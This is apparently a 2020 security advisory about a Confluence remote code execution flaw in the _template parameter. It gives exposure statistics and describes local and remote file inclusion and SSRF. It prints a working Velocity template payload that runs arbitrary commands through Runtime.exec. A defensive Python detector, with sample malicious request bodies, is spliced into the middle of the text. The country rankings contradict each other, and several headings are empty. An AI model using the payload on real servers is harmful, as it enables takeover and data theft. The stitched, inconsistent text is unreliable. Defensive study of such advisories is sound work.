Confluence remote code execution vulnerability (cve

Posted by trammel at 2020-03-27


Recently, the White Hat Security Research Institute detected a Confluence remote code execution vulnerability on the Internet. Confluence is a professional enterprise knowledge management and collaboration product that is often used to build enterprise wikis. Its editing and site management features help team members share information, collaborate on documents, hold discussions and push information. Using this vulnerability, arbitrary files on the server can be read, and malicious files can then be included to execute code. This may lead to sensitive information disclosure, server takeover and other serious consequences.

Distribution

According to FOFA statistics, there are 78158 open Confluence services in the world. The United States has the most, with 23002 services; Germany is second, with 14385; China is third, with 7281; Australia is fourth, with 7959; Ireland is fifth, with 2893.

Global distribution (not the scope of vulnerability impact)

Within China, Zhejiang has the most open Confluence services, with 3040; Beijing is second, with 1713; Shanghai is third, with 532; Guangdong is fourth, with 525.

National distribution (not the scope of vulnerability impact)

Vulnerability details

Modifying the value of the _template parameter in the request results in local file inclusion. The figure below shows the content of the /etc/passwd file being obtained.

Remote files can also be included. The HTTPS protocol is supported; HTTP cannot be used at present. The figure below shows a remote file being included to execute a remote command and obtain the Java version number. SSRF attacks can also be carried out through the same parameter.

The content of the remote file that executes the command is as follows (the command must be written with its absolute path):
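A defender-side check for the behaviour described above, as an added example that is not from the original article: it pulls the `_template` value out of logged request bodies and flags absolute paths, traversal sequences and URL schemes. The JSON and form-encoded body shapes, the `params` wrapper, the file names and the host are constructed assumptions.

```python
import json
import re
from urllib.parse import parse_qsl, unquote

# "<scheme>://" at the start of a value (https, http, file, ftp, ...).
SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)
DRIVE = re.compile(r"^[a-z]:[\\/]", re.I)   # Windows absolute path

def find_template_values(body):
    """Collect every `_template` value from a JSON or form-encoded body."""
    found = []
    def walk(node):
        if isinstance(node, dict):
            for key, value in node.items():
                if key == "_template" and isinstance(value, str):
                    found.append(value)
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)
    try:
        walk(json.loads(body))
    except ValueError:  # not JSON: treat the body as form-encoded
        found += [v for k, v in parse_qsl(body) if k == "_template"]
    return found

def classify(value):
    """Return 'remote-include', 'local-file-include' or 'ok'."""
    v = unquote(value).strip()
    if SCHEME.match(v):
        return "remote-include"        # remote template fetch, also SSRF
    if v.startswith(("/", "\\")) or ".." in v or DRIVE.match(v):
        return "local-file-include"    # absolute path or traversal
    return "ok"

def scan(bodies):
    """Return (index, value, verdict) for each suspicious `_template`."""
    return [(i, value, classify(value))
            for i, body in enumerate(bodies)
            for value in find_template_values(body)
            if classify(value) != "ok"]

# Constructed sample request bodies (assumed shapes, not captured traffic).
SAMPLES = [
    '{"params": {"width": "300", "_template": "/etc/passwd"}}',
    '{"params": {"_template": "https://files.example.invalid/t.vm"}}',
    '{"params": {"width": "300", "_template": "widget.vm"}}',
    "width=300&_template=..%2F..%2Fetc%2Fpasswd",
]
```

Calling `scan(SAMPLES)` returns the three suspicious entries and skips the relative template name.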

#set($e="e") $e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("{command}",null,null).toString();

Reverse shell:

Affected versions

Vulnerability PoC

The FOFA client and the related PoC now support detection of the vulnerability described in this article.

CVE number


Remediation advice

The vulnerability has been officially fixed. Please download a fixed version from the official website:

References


